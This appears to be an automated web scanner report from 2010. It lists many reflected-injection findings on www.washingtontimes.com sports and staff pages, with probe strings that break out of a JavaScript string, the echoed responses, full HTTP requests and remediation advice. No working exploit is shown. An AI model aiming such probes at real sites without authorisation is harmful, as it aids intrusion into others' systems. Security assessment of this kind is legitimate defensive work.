HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14746 Date: Mon, 13 Dec 2010 21:32:06 GMT X-Varnish: 570582169 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ript"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="sports29226";db736c53825"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6dc80"%3b681330eac9 was submitted in the REST URL parameter 1. This input was echoed as 6dc80";681330eac9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sports6dc80"%3b681330eac9/golf/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14734 Date: Mon, 13 Dec 2010 21:32:09 GMT X-Varnish: 570582013 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ript"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="sports6dc80";681330eac9"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f127c'%3b476e511c3ed was submitted in the REST URL parameter 1. This input was echoed as f127c';476e511c3ed in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sportsf127c'%3b476e511c3ed/golf/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14564 Date: Mon, 13 Dec 2010 21:32:24 GMT X-Varnish: 570582258 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec82e"%3b67b46d440e0 was submitted in the REST URL parameter 1. This input was echoed as ec82e";67b46d440e0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sportsec82e"%3b67b46d440e0/hockey/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14769 Date: Mon, 13 Dec 2010 21:31:42 GMT X-Varnish: 570581625 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ript"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="sportsec82e";67b46d440e0"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea866'%3ba081e53b159 was submitted in the REST URL parameter 1. This input was echoed as ea866';a081e53b159 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sportsea866'%3ba081e53b159/hockey/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14739 Date: Mon, 13 Dec 2010 21:32:01 GMT X-Varnish: 570581873 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ef81'%3b1c6ec8140f7 was submitted in the REST URL parameter 1. This input was echoed as 2ef81';1c6ec8140f7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sports2ef81'%3b1c6ec8140f7/soccer/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14578 Date: Mon, 13 Dec 2010 21:33:26 GMT X-Varnish: 570583636 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd23a"%3bfd38018970c was submitted in the REST URL parameter 1. This input was echoed as dd23a";fd38018970c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sportsdd23a"%3bfd38018970c/soccer/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14769 Date: Mon, 13 Dec 2010 21:32:58 GMT X-Varnish: 570582953 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ript"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="sportsdd23a";fd38018970c"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bbd81'%3b3fb869dcf85 was submitted in the REST URL parameter 1. This input was echoed as bbd81';3fb869dcf85 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sportsbbd81'%3b3fb869dcf85/tennis/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14746 Date: Mon, 13 Dec 2010 21:32:17 GMT X-Varnish: 570582410 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cad68"%3bbba3edf267f was submitted in the REST URL parameter 1. This input was echoed as cad68";bba3edf267f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sportscad68"%3bbba3edf267f/tennis/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14564 Date: Mon, 13 Dec 2010 21:31:56 GMT X-Varnish: 570581742 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ript"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="sportscad68";bba3edf267f"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50e1c"%3bd7295a814a2 was submitted in the REST URL parameter 1. This input was echoed as 50e1c";d7295a814a2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /staff50e1c"%3bd7295a814a2/jim-mcelhatton/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14549 Date: Mon, 13 Dec 2010 21:27:58 GMT X-Varnish: 570576734 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... cript"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="staff50e1c";d7295a814a2"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0c9f'%3bb51e55db5e7 was submitted in the REST URL parameter 1. This input was echoed as d0c9f';b51e55db5e7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /staffd0c9f'%3bb51e55db5e7/jim-mcelhatton/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14734 Date: Mon, 13 Dec 2010 21:28:08 GMT X-Varnish: 570577194 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bf77"%3bc3886e3dbc1 was submitted in the REST URL parameter 1. This input was echoed as 7bf77";c3886e3dbc1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /staff7bf77"%3bc3886e3dbc1/kara-rowland/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14740 Date: Mon, 13 Dec 2010 21:27:40 GMT X-Varnish: 570576274 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... cript"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="staff7bf77";c3886e3dbc1"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22b50'%3beb21f0e7a5c was submitted in the REST URL parameter 1. This input was echoed as 22b50';eb21f0e7a5c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /staff22b50'%3beb21f0e7a5c/kara-rowland/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14710 Date: Mon, 13 Dec 2010 21:27:55 GMT X-Varnish: 570576847 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3666'%3b739cfcb501f was submitted in the REST URL parameter 1. This input was echoed as d3666';739cfcb501f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /staffd3666'%3b739cfcb501f/mark-a-kellner/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14717 Date: Mon, 13 Dec 2010 21:27:00 GMT X-Varnish: 570575603 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b738c"%3b8a76cf07e99 was submitted in the REST URL parameter 1. This input was echoed as b738c";8a76cf07e99 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /staffb738c"%3b8a76cf07e99/mark-a-kellner/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14734 Date: Mon, 13 Dec 2010 21:26:45 GMT X-Varnish: 570575502 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... cript"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="staffb738c";8a76cf07e99"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90972"%3baed14a47f94 was submitted in the REST URL parameter 1. This input was echoed as 90972";aed14a47f94 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /staff90972"%3baed14a47f94/patrice-hill/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14710 Date: Mon, 13 Dec 2010 21:27:13 GMT X-Varnish: 570576023 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... cript"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="staff90972";aed14a47f94"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f58e8'%3bfc2041e12c3 was submitted in the REST URL parameter 1. This input was echoed as f58e8';fc2041e12c3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /stafff58e8'%3bfc2041e12c3/patrice-hill/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14740 Date: Mon, 13 Dec 2010 21:27:41 GMT X-Varnish: 570576607 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a438'%3bb2dec041db8 was submitted in the REST URL parameter 1. This input was echoed as 2a438';b2dec041db8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /staff2a438'%3bb2dec041db8/rowan-scarborough/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14710 Date: Mon, 13 Dec 2010 21:28:19 GMT X-Varnish: 570577209 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d41c"%3baacf75e4014 was submitted in the REST URL parameter 1. This input was echoed as 8d41c";aacf75e4014 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /staff8d41c"%3baacf75e4014/rowan-scarborough/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14717 Date: Mon, 13 Dec 2010 21:27:59 GMT X-Varnish: 570576939 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... cript"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="staff8d41c";aacf75e4014"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload afe01"%3b69828b0631e was submitted in the REST URL parameter 1. This input was echoed as afe01";69828b0631e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /staffafe01"%3b69828b0631e/sean-lengell/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14710 Date: Mon, 13 Dec 2010 21:28:12 GMT X-Varnish: 570577003 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... cript"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="staffafe01";69828b0631e"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload edbc8'%3b8bdfe50a6d7 was submitted in the REST URL parameter 1. This input was echoed as edbc8';8bdfe50a6d7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /staffedbc8'%3b8bdfe50a6d7/sean-lengell/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14710 Date: Mon, 13 Dec 2010 21:28:46 GMT X-Varnish: 570577764 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44fff'%3bb52896099db was submitted in the REST URL parameter 1. This input was echoed as 44fff';b52896099db in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /staff44fff'%3bb52896099db/stephen-dinan/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14734 Date: Mon, 13 Dec 2010 21:29:03 GMT X-Varnish: 570578250 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54c47"%3b3593b73d581 was submitted in the REST URL parameter 1. This input was echoed as 54c47";3593b73d581 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /staff54c47"%3b3593b73d581/stephen-dinan/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
